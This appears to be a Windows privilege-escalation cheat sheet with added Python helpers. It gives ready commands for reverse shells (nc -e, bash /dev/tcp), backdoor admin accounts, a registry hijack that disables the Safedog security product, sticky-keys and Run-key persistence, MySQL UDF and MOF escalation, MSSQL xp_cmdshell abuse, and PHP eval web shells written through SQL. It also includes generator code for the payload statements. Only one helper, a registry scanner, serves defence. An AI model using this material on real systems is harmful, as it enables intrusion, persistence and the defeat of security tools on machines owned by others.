Privilege Escalation Notes

Windows Exp

CMD reconnaissance

Information gathering

systeminfo : OS version, build and installed hotfixes

netstat -ano : open ports with the owning PID

tasklist /svc : processes with the services each one hosts

ipconfig : IP addresses

whoami : current user

net user : local user accounts

net localgroup : local groups

wmic qfe get Caption,Description,HotFixID,InstalledOn : installed hotfixes and their install dates

wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KBxxxxxxx" : check whether one specific patch (KB) is installed
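The findstr check above answers for one KB at a time. The following added example (mine, not part of the original notes) parses the fixed-width table that wmic prints, so a whole list of KBs can be checked in one pass and the most recent patch date read off. The sample output and the KB list are constructed for the demo; wmic prints InstalledOn in the host's locale date format, so the date parser assumes US m/d/Y.

```python
import re
from datetime import datetime


def _row(caption, desc, kb, date):
    # wmic prints fixed-width columns; this mimics that layout for the constructed sample
    return f"{caption:<44}{desc:<17}{kb:<11}{date}"


# Constructed sample of `wmic qfe get Caption,Description,HotFixID,InstalledOn` (not from a real host)
SAMPLE_QFE = "\n".join([
    _row("Caption", "Description", "HotFixID", "InstalledOn"),
    _row("http://support.microsoft.com/?kbid=2919355", "Update", "KB2919355", "3/18/2014"),
    _row("http://support.microsoft.com/?kbid=2937592", "Security Update", "KB2937592", "3/18/2014"),
    _row("http://support.microsoft.com/?kbid=3000850", "Update", "KB3000850", "11/18/2014"),
]) + "\n"


def parse_wmic_table(text):
    """Parse wmic's fixed-width table into a list of dicts keyed by column name.
    Column boundaries are taken from where each header word starts, which is how wmic lays the table out."""
    lines = [l.rstrip() for l in text.splitlines() if l.strip()]
    header, rows = lines[0], lines[1:]
    names, starts, pos = header.split(), [], 0
    for name in names:
        pos = header.index(name, pos)
        starts.append(pos)
        pos += len(name)
    bounds = list(zip(starts, starts[1:] + [None]))
    return [{n: row[s:e].strip() for n, (s, e) in zip(names, bounds)} for row in rows]


def installed_hotfixes(text):
    """Set of KB ids present on the host."""
    return {r["HotFixID"] for r in parse_wmic_table(text) if r.get("HotFixID", "").startswith("KB")}


def missing_hotfixes(text, wanted):
    """KBs from `wanted` that the host lacks: the ones worth testing exploits against (or patching)."""
    have = installed_hotfixes(text)
    return sorted(kb for kb in wanted if kb not in have)


def latest_install_date(text):
    """Most recent InstalledOn date; a long gap since the last patch is itself a finding."""
    dates = []
    for r in parse_wmic_table(text):
        try:
            dates.append(datetime.strptime(r.get("InstalledOn", ""), "%m/%d/%Y").date())
        except ValueError:
            continue  # blank or non-US-format dates are skipped
    return max(dates) if dates else None


if __name__ == "__main__":
    # KB1234567 is a made-up id used only to show the "missing" path
    print(missing_hotfixes(SAMPLE_QFE, ["KB2919355", "KB1234567"]))
    print(latest_install_date(SAMPLE_QFE))
```

On a real host, feed it the output of `wmic qfe get Caption,Description,HotFixID,InstalledOn` saved to a file; the same parser works for other `wmic ... get` tables because it derives the columns from the header line.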

Adding users

net user username password /add : add a user and set its password

net localgroup administrators username /add : add the user to the Administrators group

net user guest /active:yes : enable the guest account

net user guest password : set the guest account's password

Port forwarding

Reverse shell:

shell (target): nc -e cmd ip port
shell (target): bash -i >& /dev/tcp/ip/port 0>&1 (Linux; ip = the server you control)

server: nc -vv -lp port

Port forwarding:

shell (target): lcx -slave ip port 127.0.0.1 port    (ip/port = your server's listener; the last port is the local service, e.g. 3389)
server: lcx -listen port 33891                        (first port = the one the slave connects to; point your RDP client at 33891)

ANTIFW.exe -s # start: forwards 3389 over port 80
ANTIFW.exe -l # stop: restores IIS on port 80

ew_for_Win.exe -s rcsocks -l 1080 -e 8888          # server: SOCKS proxy on 1080, waits for the target on 8888
ew_for_Win.exe -s rssocks -d IP -e 8888            # target (IP = the server)
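What lcx does is a plain two-socket relay: the slave connects out to the operator's listener and to the local service and copies bytes both ways; the listener accepts the slave and then the operator's client and bridges those two. The following added example (mine, not lcx's code) implements both halves over plain sockets and runs the whole chain on loopback, with an echo server standing in for the target's local service (127.0.0.1:3389 in the real case). Port numbers are ephemeral and all names are assumptions.

```python
import socket
import threading


def pipe(src, dst):
    """Copy bytes src -> dst until src hits EOF, then half-close dst so the peer sees EOF too."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def bridge(a, b):
    """Relay both directions between two connected sockets; returns once both sides have closed."""
    threads = [threading.Thread(target=pipe, args=(a, b), daemon=True),
               threading.Thread(target=pipe, args=(b, a), daemon=True)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    a.close()
    b.close()


def slave(server_host, server_port, local_host, local_port):
    """lcx -slave: connect out to the operator's listener and to the local service, bridge them."""
    outbound = socket.create_connection((server_host, server_port))
    local = socket.create_connection((local_host, local_port))
    bridge(outbound, local)


class Listener:
    """lcx -listen: accept the slave on one port and the operator's client (e.g. mstsc) on another, bridge them."""

    def __init__(self, host="127.0.0.1", slave_port=0, client_port=0):
        self.slave_sock = self._bind(host, slave_port)
        self.client_sock = self._bind(host, client_port)
        self.slave_port = self.slave_sock.getsockname()[1]
        self.client_port = self.client_sock.getsockname()[1]

    @staticmethod
    def _bind(host, port):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        s.bind((host, port))
        s.listen(1)
        return s

    def serve_once(self):
        slave_conn, _ = self.slave_sock.accept()   # the slave connects first ...
        client_conn, _ = self.client_sock.accept()  # ... then the operator's client
        bridge(slave_conn, client_conn)


def demo(payload=b"hello"):
    """Loopback run of the whole chain; returns what the operator-side client gets back."""
    svc = Listener._bind("127.0.0.1", 0)  # stands in for the target's local service
    svc_port = svc.getsockname()[1]

    def echo():
        conn, _ = svc.accept()
        with conn:
            while True:
                data = conn.recv(4096)
                if not data:
                    break
                conn.sendall(data)
        svc.close()

    lst = Listener()
    threading.Thread(target=echo, daemon=True).start()
    threading.Thread(target=lst.serve_once, daemon=True).start()
    threading.Thread(target=slave, args=("127.0.0.1", lst.slave_port, "127.0.0.1", svc_port), daemon=True).start()

    client = socket.create_connection(("127.0.0.1", lst.client_port), timeout=5)
    client.sendall(payload)
    got = b""
    while len(got) < len(payload):
        chunk = client.recv(4096)
        if not chunk:
            break
        got += chunk
    client.close()
    return got


if __name__ == "__main__":
    print(demo())
```

The half-close in pipe() is what makes the relay transparent: when one end closes, the EOF propagates through both hops instead of leaving the other end hanging, which is the behaviour an RDP client expects.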

Kill Dog

Killing Safedog (安全狗):

1. By default Safedog only blocks adding a user to the Administrators group, not adding a user
  a: use a user-clone exp to clone administrator's privileges directly
  b: get a reverse shell and read the administrator's password
  c: use the registry to hijack Safedog's executable, then reboot the server (regedit /s redegit.reg; redegit.reg contents below); Safedog will not come back up

2. At its strictest account-protection level Safedog also blocks adding users
  a: enable guest, then clone the user
  b: get a reverse shell and read the administrator's password
  c: edit the registry, reboot the server, Safedog is off

redegit.reg contents (an Image File Execution Options debugger hijack; backslashes inside .reg string values must be doubled):

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SafeDogGuardCenter.exe]
"Debugger"="C:\\WWW\\l.php"

Enabling 3389

How to enable:

1. Generic (WMI):
  wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

2. Win2003 / Win2008 (registry):
  REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

3. cmd one-liners for win08 / win03 / win7 / win2012 / winxp:

  win08, three commands:
  wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1
  wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName='RDP-Tcp') call setuserauthenticationrequired 1
  reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
  Also works on win2012; on win7 the first two are enough. Must be run as administrator. The second command turns NLA on; use 0 instead of 1 if your client cannot do NLA.

Query the RDP port:

REG query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber    (shown in hex: 0xd3d = 3389)

(or) find the PID of TermService with tasklist /svc, then the port bound to that PID with netstat -ano
(or) registry: the PortNumber value under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp
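The tasklist/netstat cross-reference above is easy to get wrong by eye when svchost hosts many services. This added example (mine, not from the original notes) does the join programmatically: it finds the PIDs hosting a named service in `tasklist /svc` output, collects the listening ports those PIDs own from `netstat -ano`, and also decodes the hex PortNumber from the `REG query` output. All three sample outputs are constructed.

```python
import re

# Constructed sample of `tasklist /svc` output (not from a real host)
SAMPLE_TASKLIST = """
Image Name                     PID Services
========================= ======== ============================================
System Idle Process              0 N/A
svchost.exe                    756 RpcSs
svchost.exe                   1012 TermService
svchost.exe                    860 Dhcp, EventLog, lmhosts
"""

# Constructed sample of `netstat -ano` output
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       756
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       1012
  TCP    10.0.0.5:3389          10.0.0.9:51022         ESTABLISHED     1012
  TCP    [::]:3389              [::]:0                 LISTENING       1012
  UDP    0.0.0.0:3389           *:*                                    1012
"""

# Constructed sample of `REG query ... /v PortNumber` output
SAMPLE_REGQUERY = """
HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp
    PortNumber    REG_DWORD    0xd3d
"""

# image name (may contain spaces), PID, then the comma-separated service list
TASK_RE = re.compile(r"^(?P<image>\S.*?)\s+(?P<pid>\d+)\s+(?P<services>\S.*)$")


def service_pids(tasklist_text, service):
    """PIDs of every process that hosts `service` (case-insensitive), from `tasklist /svc` output."""
    pids = set()
    for line in tasklist_text.splitlines():
        m = TASK_RE.match(line.strip())
        if not m:
            continue  # header, separator, blank
        services = [s.strip().lower() for s in m.group("services").split(",")]
        if service.lower() in services:
            pids.add(int(m.group("pid")))
    return pids


def listening_ports(netstat_text, pids):
    """(proto, port) pairs that the given PIDs are listening on, from `netstat -ano` output.
    TCP rows carry a State column, UDP rows do not, so the PID is always taken from the last field."""
    ports = set()
    for line in netstat_text.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[0] not in ("TCP", "UDP"):
            continue
        proto, local, pid = parts[0], parts[1], int(parts[-1])
        state = parts[3] if proto == "TCP" else "LISTENING"
        if pid in pids and state == "LISTENING":
            ports.add((proto, int(local.rsplit(":", 1)[1])))  # rsplit handles [::]:3389 too
    return ports


def service_ports(tasklist_text, netstat_text, service="TermService"):
    """The join the note describes: service -> PID(s) -> listening ports."""
    return sorted(listening_ports(netstat_text, service_pids(tasklist_text, service)))


def rdp_port_from_reg_query(reg_text):
    """Decode the REG_DWORD shown as hex by `REG query`; None if the value is not in the output."""
    m = re.search(r"PortNumber\s+REG_DWORD\s+(0x[0-9a-fA-F]+)", reg_text)
    return int(m.group(1), 16) if m else None


if __name__ == "__main__":
    print(service_ports(SAMPLE_TASKLIST, SAMPLE_NETSTAT))
    print(rdp_port_from_reg_query(SAMPLE_REGQUERY))
```

If the registry says one port and netstat shows TermService listening on another, the service has not been restarted since the PortNumber change; the netstat view is the one that is live.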

SQL privilege escalation

1. UDF

Manual UDF helper:

select @@basedir;  # MySQL install directory
show variables like '%plugin%';  # plugin directory; the DLL has to land there
# create lib and lib\plugin through an NTFS alternate data stream write when they do not exist yet
select 'It is dll' into dumpfile 'C:\\xxxxx\\mysql5.x\\lib::$INDEX_ALLOCATION';
select 'It is dll' into dumpfile 'C:\\xxxxx\\mysql5.x\\lib\\plugin::$INDEX_ALLOCATION';
select 0xUDFcode into dumpfile 'C:\\phpstu\\MySQL\\lib\\plugin\\mstlab.dll';  # write the UDF DLL; replace 0xUDFcode with the hex of your DLL, and double the backslashes in the path
create function cmdshell returns string soname 'mstlab.dll';   # register a function exported by the DLL (cmdshell, shell, sys_exec or sys_eval, depending on the DLL)
select cmdshell('net user');        # run a command
select shell('cmd','net user');     # run a command (DLLs that export shell())

Tips:

1. ImagePath under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MySQL is the MySQL install directory
2. datadir in my.ini is the data directory
3. UPDATE mysql.user SET File_priv='Y'; FLUSH PRIVILEGES;  forces the FILE privilege on (needs write access to mysql.user)

2. MOF

Manual MOF helper:

Save the MOF as 1.mof, then run in MySQL:
select load_file('D:/wwwroot/1.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';

Note: MOF escalation only works on systems older than Windows 2008; from 2008 onwards the wbem\mof directory is no longer auto-compiled, so it does nothing there.

3. SA (MSSQL) helper:

1. Check whether the extended stored procedures exist:
  select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
  select count(*) from master.dbo.sysobjects where name='xp_regread'
  Restore xp_cmdshell (SQL 2000):
  exec sp_dropextendedproc 'xp_cmdshell'
  exec sp_addextendedproc 'xp_cmdshell','xplog70.dll'
  Enable it (SQL 2005 and later):
  EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;

2. List directories:
  exec master..xp_cmdshell 'ver'
  (or) exec master..xp_dirtree 'c:\',1,1
  (or) drop table black
       create table black(mulu varchar(7996) NULL, ID int NOT NULL IDENTITY(1,1))--
       insert into black exec master..xp_cmdshell 'dir c:\'
       select top 1 mulu from black where id=1
    If xp_cmdshell has been removed, turn the Jet sandbox off with 5.a and escalate with 5.b

3. Write a startup item via log backup:
  alter database [master] set RECOVERY FULL
  create table cmd (a image)
  backup log [master] to disk = 'c:\cmd1' with init
  insert into cmd (a) values (0x(batcode))      -- hex of your .bat
  backup log [master] to disk = 'C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\start.bat'
  drop table cmd
  (the path is the Chinese-locale Start Menu\Programs\Startup folder; the .bat runs at the next administrator logon, with the backup header as junk in front of it)

4. Image File Execution Options hijack:
  xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','reg_sz','c:\windows\system32\cmd.exe'
  (pressing Shift five times at the logon screen then launches cmd.exe as SYSTEM)

5. Sandbox escalation:
  a: exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0; # turn the Jet sandbox off
  b: Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user mstlab mstlab /add")'); # or c:\windows\system32\ias\dnary.mdb; use that one for the string type
Enable OpenRowSet: exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;

6. Registry writes with xp_regwrite
  exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','black','REG_SZ','net user test test /add'
  Enable xp_oacreate (OLE automation, another command-execution path): exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
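Three of the tricks on this page leave the same kind of registry footprint: the Safedog redegit.reg file, the sethc.exe hijack in 4 and the Run-key write in 6. The following added example (mine, not part of the original notes) is the defender's side of that: it parses a `.reg` export (the format regedit and `reg export` produce, in which backslashes and quotes inside string values are escaped with a backslash) and flags every Image File Execution Options Debugger value plus Run/RunOnce entries that are bare commands rather than a program path. The sample export is constructed; the two IFEO entries mirror the page's, the Run entries are made up.

```python
import re

# Constructed .reg export used for the demo (not a real host's registry)
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SafeDogGuardCenter.exe]
"Debugger"="C:\\WWW\\l.php"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]
"debugger"="c:\\windows\\system32\\cmd.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe]
"DisableExceptionChainValidation"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"black"="net user test test /add"
"Updater"="C:\\Program Files\\Example\\updater.exe"
'''

# "Name"=data or @=data (default value); the name may contain escaped quotes
VALUE_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$')
IFEO_KEY = '\\currentversion\\image file execution options\\'


def _unescape(s):
    """.reg string values escape backslash and double quote with a backslash."""
    return re.sub(r'\\(.)', r'\1', s)


def parse_reg(text):
    """Yield (key, value_name, data) for every value in a .reg export; REG_SZ data is unescaped, other types kept raw."""
    key = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith('[') and line.endswith(']'):
            key = line[1:-1]
            continue
        m = VALUE_RE.match(line)
        if not m or key is None:
            continue
        name = '@' if m.group(1) is None else _unescape(m.group(1))
        data = m.group(2)
        if len(data) >= 2 and data[0] == '"' and data[-1] == '"':
            data = _unescape(data[1:-1])
        yield key, name, data


def _looks_like_path(cmd):
    """A normal autorun points at a program: quoted, %VAR%-relative, or a drive-letter path."""
    cmd = cmd.strip()
    return cmd.startswith('"') or cmd.startswith('%') or re.match(r'^[A-Za-z]:\\', cmd) is not None


def suspicious_entries(text):
    """('ifeo-debugger', image, debugger) for every IFEO Debugger value, and
    ('autorun', name, command) for Run/RunOnce values that are bare commands (e.g. net user ... /add)."""
    findings = []
    for key, name, data in parse_reg(text):
        k = key.lower()
        if IFEO_KEY in k and name.lower() == 'debugger':
            findings.append(('ifeo-debugger', key.rsplit('\\', 1)[1], data))
        elif (k.endswith('\\currentversion\\run') or k.endswith('\\currentversion\\runonce')) \
                and not _looks_like_path(data):
            findings.append(('autorun', name, data))
    return findings


if __name__ == "__main__":
    for f in suspicious_entries(SAMPLE_REG):
        print(f)
```

To produce the input on a live host: `reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" ifeo.reg` and likewise for the Run keys, then run the scanner over the files. Any Debugger value at all under IFEO deserves a look; legitimate ones are rare and point at a real debugger, not cmd.exe or a file under a web root.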

4. Writing a shell with MySQL

1. Via the general log:
    1. set global general_log='on';
    2. set global general_log_file='c:\\xxx\\xxxx\\shell.php';   # backslashes must be doubled ('\\')
    3. select "<?php eval($_POST[0])?>";

2. Via OUTFILE:
    CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL);
    INSERT INTO `mysql`.`xiaoma` (`xiaoma1`) VALUES ('<?php @eval($_POST[pass])?>');
    SELECT xiaoma1 FROM `mysql`.`xiaoma` INTO OUTFILE 'C:/xxx/xxx/WWW/shell.php';
    Run the three together: they create a table xiaoma with column xiaoma1 in the mysql database and export it to C:/xxx/xxx/WWW/shell.php. Both methods need the FILE privilege and a secure_file_priv setting that does not exclude the target path.
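The UDF section above and this one share the same two fiddly steps: turning a DLL into the `0x...` literal that `select ... into dumpfile` wants, and writing Windows paths that survive MySQL's backslash escaping (the `\\` rule). This added example (mine, not from the original notes) generates the statements for both: the ADS directory creation and DLL write for the UDF route, and the general_log route for a web shell. The plugin directory, DLL name and the four-byte stand-in for a DLL are assumptions; use `show variables like '%plugin%'` for the real directory.

```python
import binascii


def mysql_string_literal(s):
    """Single-quoted MySQL literal. MySQL treats backslash as an escape inside quotes, so every
    backslash in a Windows path must be doubled or the path silently loses them."""
    return "'" + s.replace("\\", "\\\\").replace("'", "\\'") + "'"


def ads_mkdir_statements(plugin_dir):
    """Create lib and lib\\plugin through NTFS alternate-data-stream writes when the plugin dir is missing."""
    plugin_dir = plugin_dir.rstrip("\\")
    lib_dir = plugin_dir.rsplit("\\", 1)[0]
    return [f"select 'It is dll' into dumpfile {mysql_string_literal(d + '::$INDEX_ALLOCATION')};"
            for d in (lib_dir, plugin_dir)]


def udf_statements(plugin_dir, dll_bytes, dll_name="mstlab.dll", func="cmdshell"):
    """Turn the DLL into the 0x... hex literal the 'select 0xUDFcode into dumpfile' step needs,
    then register one of the functions it exports (cmdshell here; sys_exec etc. for other DLLs)."""
    hex_literal = "0x" + binascii.hexlify(dll_bytes).decode()
    dll_path = plugin_dir.rstrip("\\") + "\\" + dll_name
    return [f"select {hex_literal} into dumpfile {mysql_string_literal(dll_path)};",
            f"create function {func} returns string soname {mysql_string_literal(dll_name)};"]


def general_log_statements(shell_path, payload="<?php eval($_POST[0])?>"):
    """The general_log trick: point the log at a file under the web root, then make MySQL log the payload."""
    return ["set global general_log='on';",
            f"set global general_log_file={mysql_string_literal(shell_path)};",
            f"select {mysql_string_literal(payload)};"]


def build_udf_script(plugin_dir, dll_bytes, dll_name="mstlab.dll", func="cmdshell"):
    """All UDF steps in order as one script."""
    return "\n".join(ads_mkdir_statements(plugin_dir) + udf_statements(plugin_dir, dll_bytes, dll_name, func))


if __name__ == "__main__":
    # b"MZ\x90\x00" is a stand-in for the DLL bytes, not a real UDF
    print(build_udf_script(r"C:\phpstu\MySQL\lib\plugin", b"MZ\x90\x00"))
    print("\n".join(general_log_statements(r"C:\www\shell.php")))
```

Feed `open("udf.dll", "rb").read()` to build_udf_script for the real thing; the hex literal for a 40 KB DLL is 80 KB of text, so send it as one statement over a client that does not truncate long queries. dumpfile (unlike outfile) writes the bytes verbatim with no row terminators, which is why it is the right primitive for a binary.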